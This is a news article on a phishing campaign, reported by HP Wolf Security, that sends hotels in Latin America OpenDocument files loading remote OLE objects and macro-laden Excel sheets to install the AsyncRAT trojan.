Security experts recently discovered hackers on a particularly covert mission to compromise hotels in Latin America using OpenDocument text files.
The unknown hackers are using a rarely seen phishing method that seems to work well so far, with VirusTotal’s detection rate for the malicious files being used being nil less than two weeks ago.
The campaign itself has also raised a number of questions due to some unique features and traits that set it apart from others.
Cybersecurity researchers at HP Wolf Security said they saw a phishing campaign that distributed OpenDocument text files in late June 2022. OpenDocument is an open, vendor-independent file format recognized as one of the most popular Microsoft Office alternatives by most productivity programs, such as Word, LibreOffice Writer, or Apache OpenOffice Writer.
These files were distributed via email to hotels in Latin America and were presented as guest registration documents.
If the victim downloads and runs the file, they are prompted to “update fields with references to other files”. The researchers describe the prompt as a “cryptic message” and say that if the victim confirms, an Exel file will be opened.
The Excel file will later prompt the user to enable macros, which is where the real problem begins, as allowing macros activates the infection chain. As a result, the victim gets installed AsyncRAT – a remote access trojan malware (opens in new tab). AsyncRAT is described as a RAT that allows threat actors to remotely monitor and control infected endpoints (opens in new tab)over a secure, encrypted connection.
This campaign is particularly covert because analysis of the OpenDocument does not reveal any hidden macros, the researchers say. However, the document does refer to Object Linking and Embedding (OLE) objects, which are hosted remotely.
The document was found with references to nearly two dozen other documents that, when downloaded and opened, contain embedded Excel spreadsheets, each asking for active macros.
The researchers seem a bit baffled by this approach, as the purpose of “so many duplicate files” remains unclear.
“Documents coming from outside an organization should always be treated with suspicion, especially if they’re trying to load external content from the Internet – but in practice, this isn’t always easy advice to follow, especially in industries that rely on it. exchange of electronic documents between suppliers and customers,” concludes HP Wolf Security.